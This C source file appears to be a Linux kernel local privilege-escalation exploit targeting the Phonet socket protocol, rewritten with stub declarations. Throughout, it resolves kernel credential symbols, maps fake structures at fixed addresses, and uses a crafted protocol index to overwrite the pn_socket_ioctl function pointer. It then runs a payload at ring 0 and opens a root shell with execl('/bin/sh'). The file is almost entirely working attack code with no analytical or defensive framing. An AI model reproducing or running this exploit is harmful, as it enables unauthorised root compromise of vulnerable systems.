
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 scalar_t__ EPERM ;
 int MAP_ANONYMOUS ;
 void* MAP_FAILED ;
 int MAP_FIXED ;
 int MAP_PRIVATE ;
 int PF_PHONET ;
 int PROT_EXEC ;
 int PROT_READ ;
 int PROT_WRITE ;
 int SOCK_DGRAM ;
 void* commit_creds ;
 scalar_t__ errno ;
 int execl (char*,char*,int *) ;
 void* get_kernel_sym (char*) ;
 scalar_t__ getuid () ;
 int ioctl (int,int ,int *) ;
 int konami ;
 int memcpy (void*,int *,int) ;
 void* mmap (void*,int,int,int,int ,int ) ;
 void* prepare_kernel_cred ;
 int printf (char*) ;
 int socket (int ,int ,int) ;

int main(int argc, char * argv[])
{

        int sock, proto, i, offset = -1;
        unsigned long proto_tab, landing, target, pn_ops, pn_ioctl, *ptr;
        void * map;


        printf("[*] Testing Phonet support and CAP_SYS_ADMIN...\n");
        sock = socket(PF_PHONET, SOCK_DGRAM, 0);

        if(sock < 0) {
                if(errno == EPERM)
                        printf("[*] You don't have CAP_SYS_ADMIN.\n");

                else
                        printf("[*] Failed to open Phonet socket.\n");

                return -1;
        }


        printf("[*] Resolving kernel symbols...\n");

        proto_tab = get_kernel_sym("proto_tab");
        pn_ops = get_kernel_sym("phonet_dgram_ops");
        pn_ioctl = get_kernel_sym("pn_socket_ioctl");
        commit_creds = get_kernel_sym("commit_creds");
        prepare_kernel_cred = get_kernel_sym("prepare_kernel_cred");

        if(!proto_tab || !commit_creds || !prepare_kernel_cred ||
           !pn_ops || !pn_ioctl) {
                printf("[*] Failed to resolve kernel symbols.\n");
                return -1;
        }


        landing = 0x20000000;
        proto = 1 << 31 | (landing - proto_tab) >> 2;


        printf("[*] Preparing fake structures...\n");

        map = mmap((void *)landing, 0x10000,
                   PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

        if(map == MAP_FAILED) {
                printf("[*] Failed to map landing area.\n");
                return -1;
        }


        ptr = (unsigned long *)landing;
        ptr[0] = &ptr[1];


        for(i = 1; i < 4; i++)
                ptr[i] = &ptr[4];


        for(i = 4; i < 204; i++)
                ptr[i] = &ptr[204];


        target = 0x30000000;


        for(i = 204; i < 404; i++)
                ptr[i] = target;


        map = mmap((void *)0x30000000, 0x2000000,
                   PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

        if(map == MAP_FAILED) {
                printf("[*] Failed to map landing area.\n");
                return -1;
        }

        printf("[*] Calculating offsets...\n");

        socket(PF_PHONET, SOCK_DGRAM, proto);

        ptr = 0x30000000;
        for(i = 0; i < 0x800000; i++) {
                if(ptr[i] != 0) {
                        offset = i * sizeof(void *);
                        break;
                }
        }

        if(offset == -1) {
                printf("[*] Test run failed.\n");
                return -1;
        }


        target = pn_ops + 10 * sizeof(void *) - 1 - offset;


        ptr = (unsigned long *)landing;
        for(i = 204; i < 404; i++)
                ptr[i] = target;


        printf("[*] Modifying function pointer...\n");

        landing = pn_ioctl;
        while((landing & 0xff000000) != 0x10000000) {
                socket(PF_PHONET, SOCK_DGRAM, proto);
                landing += 0x01000000;
        }


        map = mmap((void *)(landing & ~0xfff), 0x10000,
                   PROT_READ | PROT_WRITE | PROT_EXEC,
                   MAP_PRIVATE | MAP_ANONYMOUS | MAP_FIXED, 0, 0);

        if(map == MAP_FAILED) {
                printf("[*] Failed to map payload area.\n");
                return -1;
        }


        memcpy((void *)landing, &konami, 1024);

        printf("[*] Executing Konami code at ring0...\n");
        ioctl(sock, 0, ((void*)0));

        if(getuid()) {
                printf("[*] Exploit failed to get root.\n");
                return -1;
        }

        printf("[*] Konami code worked!  Have a root shell.\n");
        execl("/bin/sh", "/bin/sh", ((void*)0));

}
